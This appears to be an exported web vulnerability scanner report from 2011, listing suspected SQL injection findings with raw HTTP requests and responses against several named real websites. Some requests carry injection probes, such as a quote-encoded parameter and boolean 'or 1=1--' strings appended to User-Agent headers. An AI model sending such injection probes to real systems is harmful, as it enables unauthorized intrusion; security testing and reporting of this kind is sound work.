| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:13:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298762019 Vary: Cookie X-Pingback: http://bad-behavior Content-Length: 51670 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org <meta property= ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /feed/ |
| GET /feed/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:11:36 GMT Content-Type: text/xml; charset=UTF-8 Connection: close X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761895 Vary: Cookie X-Pingback: http://bad-behavior Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT ETag: "d0aa19c0e184cf0e188 Content-Length: 41692 <?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http:/ xmlns:wfw="http:/ xmlns:dc="http://purl.org ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://bad-behavior |
| Path: | /feed/atom/ |
| GET /feed/atom/?1%2527=1 HTTP/1.1 Host: bad-behavior.ioerror.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: bb2_screener_=1298752932 |
| HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:11:42 GMT Content-Type: application/atom+xml; charset=UTF-8 Connection: close X-Powered-By: PHP/5.3.4 Set-Cookie: bb2_screener_=1298761902 Vary: Cookie X-Pingback: http://bad-behavior Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT ETag: "d0aa19c0e184cf0e188 Content-Length: 45367 <?xml version="1.0" encoding="UTF-8"?><feed xmlns="http://www.w3.org xmlns:thr="http://purl xml:lang="en" xml:base="http://bad ...[SNIP]... 2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | https://client.traff |
| Path: | /_mint/ |
| GET /_mint/?js HTTP/1.1 Host: client.trafficshaping.com Connection: keep-alive Referer: https://client.traff Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d1-- Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: csId=3922e3f116c2b71 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.traff Content-Length: 2003 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://www.traffics path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; Mint.save(); |
| GET /_mint/?js HTTP/1.1 Host: client.trafficshaping.com Connection: keep-alive Referer: https://client.traff Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d2-- Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: csId=3922e3f116c2b71 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:19 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.traff Content-Length: 2015 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://www.traffics path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; Mint.save(); |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://duckduckgo.com |
| Path: | /ie/v1/api/oembed |
| GET /ie/v1/api/oembed?urls Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 504 Gateway Time-out Server: nginx Date: Tue, 01 Mar 2011 02:01:37 GMT Content-Type: text/html Content-Length: 4637 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <div id="error"> ...[SNIP]... |
| GET /ie/v1/api/oembed?urls Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:01:40 GMT Content-Type: application/json Connection: keep-alive Content-Length: 4275 Etag: "2016ae18671a1b7b5e0 nreb([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.a ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://googleads.g |
| Path: | /pagead/ads |
| GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
| HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:53:54 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 10985 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div> ...[SNIP]... |
| GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
| HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:53:55 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 11041 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://googleads.g |
| Path: | /pagead/ads |
| GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
| HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:59:52 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 10976 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div> ...[SNIP]... |
| GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive Referer: http://www.thedetroi Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b |
| HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 26 Feb 2011 20:59:53 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 14565 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://o.aolcdn.com |
| Path: | /os_merge/ |
| GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.winamp.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 1835 Cache-Control: public, max-age=30 Expires: Sun, 27 Feb 2011 17:46:13 GMT Date: Sun, 27 Feb 2011 17:45:43 GMT Connection: close Vary: Accept-Encoding <html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!- : file=/aol/jquery.getjs-1 : file=/aol/jquery.getjs-1 : file=/aol/jquery.getjs-1 ...[SNIP]... |
| GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.winamp.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT Content-Type: text/plain Cache-Control: public, max-age=2592000 Expires: Tue, 29 Mar 2011 17:45:43 GMT Date: Sun, 27 Feb 2011 17:45:43 GMT Connection: close Vary: Accept-Encoding Content-Length: 15821 (function(d,c){d // jquery.openwindow-1.0.min (function(i,o){var q=0;i.openWindow=function l(f,k);b.push("width="+f) function(h){return this.each(function(){var a=this,b=a.href;b&&i(a) /* jQuery Omniture Tracking Plugin Eaily attach click tracking to any link. Dependencies: - Omniture H Code (s_265 object) - jQuery 1.4.2 Usage: $("#my-link").omniTrack({ suite: "aolshare", // Suite the click ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://peoplepond.com |
| Path: | /_mint/ |
| GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: symfony=b452c47d2256 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:04 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5171 Connection: close Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/ path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent if (navigator.plug ...[SNIP]... |
| GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: symfony=b452c47d2256 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:08 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5161 Connection: close Content-Type: text/javascript var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/ path = path.replace(/^https?:/, window.location.protocol) // Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin] { path += this[developer][plugin] }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime(); // Redirect to the debug page if (debug) { window.open(path+'&debug var ie = /*@cc_on!@*/0; if (!ie && document.getElements { var tag = (document.createElementNS tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElements } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window var resource = (window.decodeURI)?window return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_Docum } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent if (navigator.plugins && nav ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>javax.servlet at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23783 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system at com.digitalriver.system ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 Referer: http://www.google.com |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:54 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 32916 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: REQ_000002 at com.digitalriver.catalog at com.digitalriver.rules at ...[SNIP]... |
| GET /store?Action=Displa Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 Referer: http://www.google.com |
| HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:55 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://shop.winamp.com |
| Path: | /store |
